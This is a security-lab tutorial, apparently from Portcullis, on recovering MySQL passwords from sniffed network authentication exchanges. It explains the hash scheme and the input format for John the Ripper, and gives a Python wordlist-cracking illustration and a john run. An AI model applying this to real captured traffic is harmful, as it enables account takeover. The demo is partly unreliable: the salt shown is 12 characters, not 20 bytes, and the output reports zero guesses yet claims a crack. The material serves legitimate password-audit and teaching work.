John the Ripper's magnum-jumbo branch now supports MySQL network authentication hashes. These are not the stored password hashes you'd find in the mysql.user table; they are the challenge-response values a client sends on the wire as part of the authentication protocol, so they can be recovered from a packet capture rather than from the database.

If you go into Wireshark and look at some MySQL traffic for versions >=4.1, you'll see a "Server Greeting" packet which contains a random salt value. Wireshark dissects this for you, but shows the 20-byte salt as two fields (an 8-byte "Salt" and a 12-byte "Extended Salt"); concatenate them in that order, without the trailing NUL terminator, to get the full salt. Then look for the "Login Request" packet from the client and find the password field: this is a 20-byte value derived from the real password and the salt.

The hash’s construction is as follows:

SHA1( password ) XOR SHA1( salt <concat> SHA1( SHA1( password ) ) )

The scheme itself isn't particularly important. What matters is that it costs only three SHA-1 computations per candidate, with no iteration or work factor, so a captured salt/response pair can be attacked with a wordlist very quickly (the per-session salt only rules out precomputed tables). JTR can now crack these hashes, but there's a step missing from the documentation because it assumes you're pulling the data from a Cain & Abel sniffer rather than directly from Wireshark. What it doesn't tell you is that you must manually hash the 20-byte salt value with SHA-1, then put the result in your password file (the hash file you pass to john) in the following format:

username:$mysqlna$hashed_salt*password_hash

JTR can then automatically recognise the hash as a MySQL native authentication hash. Cain’s sniffer automatically hashes the salt value (it calls this the challenge), which is why the step is missing from the documentation.
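A worked example of the scheme above and of the input line described for john, added here as illustration; it is not code from the original post or from John the Ripper. The scramble, password and wordlist are constructed, not captured. The server-side check and the mysql.user stored hash go slightly beyond the post, to show concretely why the on-the-wire value differs from the stored one, and the john line is built exactly as the post describes (SHA-1 of the salt, then the password field):

```python
import hashlib
from typing import Iterable, Optional


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def mysql_native_token(password: str, scramble: bytes) -> bytes:
    """Compute the 20-byte value a MySQL 4.1+ client sends in the Login Request:
    SHA1(password) XOR SHA1(scramble || SHA1(SHA1(password))).
    The scramble is the 20-byte salt from the Server Greeting."""
    if len(scramble) != 20:
        raise ValueError("MySQL 4.1+ scramble must be exactly 20 bytes")
    pw_hash = sha1(password.encode("utf-8"))
    return xor(pw_hash, sha1(scramble + sha1(pw_hash)))


def stored_password_hash(password: str) -> str:
    """The value mysql.user holds for this scheme: '*' + hex(SHA1(SHA1(pw))).
    Included only to contrast it with the on-the-wire token above."""
    return "*" + sha1(sha1(password.encode("utf-8"))).hex().upper()


def server_verify(stored: str, scramble: bytes, token: bytes) -> bool:
    """How the server checks a token using only the stored double SHA-1:
    token XOR SHA1(scramble || stored) must hash to stored."""
    double = bytes.fromhex(stored.lstrip("*"))
    return sha1(xor(token, sha1(scramble + double))) == double


def john_line(username: str, scramble: bytes, token: bytes) -> str:
    """Build the input line in the form the post describes for john:
    username:$mysqlna$<hex of SHA-1(salt)>*<hex of password field>."""
    return f"{username}:$mysqlna${sha1(scramble).hex()}*{token.hex()}"


def crack(token: bytes, scramble: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline wordlist attack: three SHA-1s per candidate and no iteration,
    so this is cheap even in pure Python."""
    for candidate in wordlist:
        if mysql_native_token(candidate, scramble) == token:
            return candidate
    return None


# Constructed sample "capture" (not real traffic). Wireshark shows the 20-byte
# salt as an 8-byte Salt and a 12-byte Extended Salt; join them in that order.
SALT = b"Kx!3pZq#"
EXTENDED_SALT = b"7w@L2rVe^nYb"
SCRAMBLE = SALT + EXTENDED_SALT
# The password field a client would send for the (constructed) password "bacon".
TOKEN = mysql_native_token("bacon", SCRAMBLE)
# A constructed wordlist standing in for password.lst.
WORDLIST = ["password", "123456", "letmein", "bacon", "qwerty"]

if __name__ == "__main__":
    print(john_line("root", SCRAMBLE, TOKEN))
    print("cracked:", crack(TOKEN, SCRAMBLE, WORDLIST))
    print("server accepts token:",
          server_verify(stored_password_hash("bacon"), SCRAMBLE, TOKEN))
```

The `crack` function is the whole attack in miniature: anyone holding the salt and the password field from one session can test candidates at SHA-1 speed, which is exactly what john does at scale.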

As a quick demo:

Username = root
Salt (from the Server Greeting) = D|ecBa?Vuh-B
SHA-1(Salt) = b19b45d3cca9af80ccff343a78a02db6bd39a4c7
Password field (from the Login Request) = a6f6a3a746caa99690eecba786629cfe43e87658

This becomes…

root:$mysqlna$b19b45d3cca9af80ccff343a78a02db6bd39a4c7*a6f6a3a746caa99690eecba786629cfe43e87658

root@vm# ./john --wordlist=password.lst ~/mysql-na.pwd
Loaded 1 password hash (MySQL Network Authentication SHA1 [32/64])
guesses: 0  time: 0:00:00:00 DONE (Thu May  9 14:14:50 2013)  c/s: 52650  trying: bacon

Cracked! To list recovered passwords alongside their usernames afterwards, run ./john --show ~/mysql-na.pwd.

Written by: Graham Sutherland of Portcullis.

References:

* MySQL documentation for the password hash scheme:
http://dev.mysql.com/doc/internals/en/authentication-method.html#secure-password-authentication (accessed 22nd of May, 2013)

* JTR magnum-jumbo project page:
https://github.com/magnumripper/JohnTheRipper/ (accessed 22nd of May, 2013)

Any questions/feedback?

If you have any further questions or feedback regarding the Cracking MySQL network authentication hashes with John The Ripper article, please do get in touch! We would like to hear your thoughts. You may contact us at: labs@portcullis-security.com.
